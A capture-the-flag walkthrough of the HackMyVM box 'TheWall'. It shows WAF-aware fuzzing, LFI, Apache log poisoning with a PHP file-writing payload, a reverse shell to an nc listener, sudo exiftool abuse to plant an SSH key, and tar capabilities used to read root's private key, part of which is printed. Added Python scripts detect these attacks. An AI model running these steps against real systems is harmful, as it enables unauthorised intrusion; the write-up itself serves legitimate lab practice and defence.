NOTES ABOUT TheWall
[ 2022-10-20 ] [ HackMyVM / TheWall ] Status: Developed by me
Skills: Port Scanning, Fuzz, WAF Evasion, LFI, Log Poisoning & RCE, SUDO Misconfiguration, OpenSSL, Modified Capabilities Exploitation
Tools: nmap, ssh, gobuster, nc, exiftool, tar, ssh-keygen, getcap
PORT SCANNING
$ nmap -T4 -sCSV -p- 10.0.2.31
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey:
| 3072 89:60:29:db:68:6d:13:34:98:b9:d0:17:24:56:a8:9e (RSA)
| 256 66:58:51:6d:cd:3a:67:46:36:56:9a:31:a0:08:13:cf (ECDSA)
|_ 256 f7:34:9e:53:68:ba:c2:06:ab:14:c3:21:90:2d:6e:64 (ED25519)
80/tcp open http Apache httpd 2.4.54 ((Debian))
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.4.54 (Debian)
GETTING IN
THE WEB SERVER HAS A WAF THAT RESPONDS WITH A 403 ERROR IF
THE MAXIMUM NUMBER OF "NOT FOUND" REQUESTS PER MINUTE IS EXCEEDED
$ gobuster -q dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php -u http://10.0.2.31 --delay 1s -t 1
/index.php (Status: 200) [Size: 25]
/includes.php (Status: 200) [Size: 2]
FUZZING TO GET THE PARAMETER NAME (THE PAGE ANSWERS 200, SO NO 404 ERRORS AND THE WAF DOES NOT TRIGGER)
$ gobuster -q fuzz -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.0.2.31/includes.php?FUZZ=/etc/passwd --exclude-length 2
Found: [Status=200] [Length=1460] http://10.0.2.31/includes.php?display_page=/etc/passwd
/etc/passwd
root:x:0:0:root:/root:/bin/bash
john:x:1000:1000:,,,:/home/john:/bin/bash
SEARCHING FILES WITH [LFI-Digger]: APACHE LOG IS READABLE
$ python2 lfidigger.py "http://10.0.2.31/includes.php?display_page=%LFI%" ./dics/linux_apache_logs.txt false
[+] /var/log/apache2/access.log - http://10.0.2.31/includes.php?display_page=/var/log/apache2/access.log
10.0.2.15 - - [19/Oct/2022:20:00:23 -0400] "GET / HTTP/1.0" 200 192 "-" "-"
10.0.2.15 - - [19/Oct/2022:20:00:23 -0400] "GET /nmaplowercheck1666234825 HTTP/1.1" 404 192 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
10.0.2.15 - - [19/Oct/2022:20:00:23 -0400] "POST / HTTP/1.1" 200 192 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
10.0.2.15 - - [19/Oct/2022:20:00:23 -0400] "GET /.git/HEAD HTTP/1.1" 404 192 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
10.0.2.15 - - [19/Oct/2022:20:00:23 -0400] "OPTIONS / HTTP/1.1" 200 192 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
APACHE'S LOG POISONING
$ nc 10.0.2.31 80
GET <?php file_put_contents('/tmp/rshell.php',base64_decode($_GET['e'])); ?>
BROWSE: PAYLOAD EXECUTION.
SENDING A PHP REVERSE SHELL, BASE64 ENCODED, TO BE WRITTEN.
includes.php?display_page=/var/log/apache2/access.log&e=[...]
REVERSE SHELL CALL:
includes.php?display_page=/tmp/rshell.php
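Added defender-side example, not part of the original notes: a Python check over Apache access-log lines (constructed samples in the format shown above) that flags the three things this section relies on: a burst of 404s from one client (the rule the WAF enforces), PHP tags landing in a logged field (log poisoning), and query-string values that look like file paths (the display_page LFI). The burst/window thresholds and the sample lines are assumptions.

```python
"""Added defender-side review of Apache "combined" access-log lines (example, not from the VM):
flags 404 bursts per client (the WAF rule), PHP tags in logged fields, and path-like query values."""
import re
from collections import defaultdict, deque
from datetime import datetime
from urllib.parse import parse_qsl, urlsplit

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
                    r'(?P<status>\d{3}) \S+ "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$')
PHP_TAG = re.compile(r'<\?(php|=)', re.IGNORECASE)   # PHP code must never end up in a log
PATH_LIKE = re.compile(r'^/|\.\./')                   # absolute path or traversal in a value

def analyze(lines, burst=10, window=60):
    """Return (kind, client_ip, detail) findings; burst/window thresholds are assumptions."""
    findings, recent_404 = [], defaultdict(deque)
    for line in lines:
        m = LOG_RE.match(line)
        if not m:                                     # malformed lines deserve a look too
            findings.append(("unparsable", "-", line[:60]))
            continue
        ip, req = m["ip"], m["req"]
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        # Poisoning: request line, referer or user agent carrying PHP tags.
        if any(PHP_TAG.search(m[f]) for f in ("req", "ref", "ua")):
            findings.append(("php_tag", ip, req))
        # LFI: a query value that looks like a file path (display_page=/etc/passwd).
        parts = req.split(" ")
        if len(parts) == 3:
            for key, val in parse_qsl(urlsplit(parts[1]).query):
                if PATH_LIKE.search(val):
                    findings.append(("lfi_param", ip, f"{key}={val}"))
        # 404 burst: sliding window per client, reported once when the threshold is hit.
        if m["status"] == "404":
            q = recent_404[ip]
            q.append(ts)
            while (ts - q[0]).total_seconds() > window:
                q.popleft()
            if len(q) == burst:
                findings.append(("404_burst", ip, f"{burst} not-found hits in {window}s"))
    return findings

# Constructed sample: normal hit, brute-force burst, LFI probe, benign PHP tag for the poisoning.
SAMPLE = ['10.0.2.15 - - [19/Oct/2022:20:00:23 -0400] "GET / HTTP/1.0" 200 192 "-" "-"']
SAMPLE += [f'10.0.2.15 - - [19/Oct/2022:20:01:{s:02d} -0400] "GET /w{s}.php HTTP/1.1" '
           '404 192 "-" "gobuster/3.1"' for s in range(12)]
SAMPLE += ['10.0.2.15 - - [19/Oct/2022:20:05:00 -0400] "GET /includes.php?display_page='
           '/etc/passwd HTTP/1.1" 200 1460 "-" "-"',
           '10.0.2.15 - - [19/Oct/2022:20:09:10 -0400] "GET <?php echo 1; ?> HTTP/1.0" 400 0 "-" "-"']

if __name__ == "__main__":
    print(*analyze(SAMPLE), sep="\n")
```

Feeding the real /var/log/apache2/access.log through analyze() would surface the gobuster burst, the LFI probe and the poisoned request line from this walkthrough in one pass.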
ELEVATING PRIVILEGES
$ nc -lvnp 80
listening on [any] 80 ...
connect to [10.0.2.15] from (UNKNOWN) [10.0.2.31] 45696
Linux TheWall 5.10.0-18-amd64 #1 SMP Debian 5.10.140-1 (2022-09-02) x86_64 GNU/Linux
20:37:07 up 38 min, 0 users, load average: 0.01, 0.14, 0.24
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ sudo -l
Matching Defaults entries for www-data on TheWall:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User www-data may run the following commands on TheWall:
(john : john) NOPASSWD: /usr/bin/exiftool
GENERATE SSH KEYS WITH ssh-keygen.
WRITE SSH AUTHORIZED KEY VIA SUDO EXIFTOOL
$ echo "ssh-rsa [...] kali@kali" > /tmp/id_rsa.pub
$ sudo -u john /usr/bin/exiftool -filename=/home/john/.ssh/authorized_keys /tmp/id_rsa.pub
$ exit
$ ssh john@10.0.2.31 -i id_rsa #connect with key
john@TheWall:~$ cat user.txt
SEARCH FILES THAT BELONG TO USER'S GROUP
john@TheWall:~$ find / -xdev -group 1000 2>/dev/null
/home/john
/home/john/.bash_logout
/home/john/.local
/home/john/.local/share
/home/john/.local/share/nano
/home/john/.bashrc
/home/john/.profile
/home/john/user.txt
/home/john/.ssh
/home/john/.ssh/authorized_keys
/home/john/.bash_history
/var/lib/sudo/lectured/john
/usr/sbin/tar
SEARCH FOR FILES WITH MODIFIED CAPABILITIES
john@TheWall:~$ /sbin/getcap -r / 2>/dev/null
/usr/sbin/tar cap_dac_read_search=ep
/usr/bin/ping cap_net_raw=ep
USE TAR CAPABILITIES TO READ ROOT'S PRIVATE KEY
john@TheWall:~$ /sbin/tar cf id_rsa.tar /id_rsa
/sbin/tar: Removing leading `/' from member names
john@TheWall:~$ tar xf id_rsa.tar
john@TheWall:~$ cat id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn
NhAAAAAwEAAQAAAYEAvgS2V50JB5doFy4G99JzapbZWie7kLRHGrsmRk5uZPFPPtH/m9xS
FPJMi5x3EWnrUW6MpPE9I3tT1EEaA/IoDApV1cn7rw7dt9LkEJrWn/MfsXr5B1wGzof66V
[...]
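Added example, not from the VM or its author: a Python audit of `getcap -r /` output that flags file capabilities able to bypass permission checks, as cap_dac_read_search on tar does here. The risk table, the Debian allow-list entry for ping and the third sample line are assumptions.

```python
"""Added example (not from the VM): audit `getcap -r /` output for file capabilities that
bypass permission checks, the way tar's cap_dac_read_search does on this box."""
import re

# Why each capability matters (assumed, condensed from capabilities(7)); others are "review".
RISK = {
    "cap_dac_read_search": "high: bypasses read/search permission on every file",
    "cap_dac_override": "high: bypasses read, write and execute permission checks",
    "cap_chown": "high: can change ownership of any file",
    "cap_fowner": "high: bypasses owner checks on chmod and friends",
    "cap_setuid": "critical: can switch to any uid",
    "cap_sys_admin": "critical: broad administrative capability",
    "cap_sys_ptrace": "critical: can inspect and control other processes",
    "cap_setfcap": "critical: can grant capabilities to other binaries",
}
# Path/capability pairs accepted on a stock Debian install (assumption for this example).
EXPECTED = {("/usr/bin/ping", "cap_net_raw")}
# Both getcap styles: "path cap=flags" (libcap 2.4x) and "path = cap+flags" (older).
CAP_LINE = re.compile(r"^(?P<path>\S+)\s+(?:=\s+)?(?P<caps>\S+)$")

def parse_caps(spec):
    """'cap_dac_read_search,cap_net_raw=ep' or 'cap_net_raw+ep' -> {'cap_...', ...}."""
    names = re.split(r"[=+-]", spec, maxsplit=1)[0]   # drop the e/p/i flag part
    return {c for c in names.split(",") if c}

def audit(lines):
    """Return (path, capability, verdict) for every capability not on the allow-list."""
    findings = []
    for line in lines:
        m = CAP_LINE.match(line.strip())
        if not m:
            continue
        for cap in sorted(parse_caps(m["caps"])):
            if (m["path"], cap) not in EXPECTED:
                findings.append((m["path"], cap, RISK.get(cap, "review: unexpected")))
    return findings

# The two lines from the writeup plus one constructed entry in the older format.
SAMPLE = ["/usr/sbin/tar cap_dac_read_search=ep",
          "/usr/bin/ping cap_net_raw=ep",
          "/usr/bin/dumpcap = cap_net_admin,cap_net_raw+eip"]

if __name__ == "__main__":
    for path, cap, verdict in audit(SAMPLE):
        print(f"{path:20} {cap:22} {verdict}")
```

On the box the fix is to drop the set with `setcap -r /usr/sbin/tar`, then find out how it was granted; piping live `getcap -r / 2>/dev/null` output into audit() gives the same report for any host.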
CONNECT USING PRIVATE KEY
$ chmod 0400 ./private_root
$ ssh root@10.0.2.31 -i private_root
root@TheWall:~# cat r0Ot.txT
root@TheWall:~# init 0
I HOPE YOU HAVE ENJOYED THIS VM
Regards,
Claor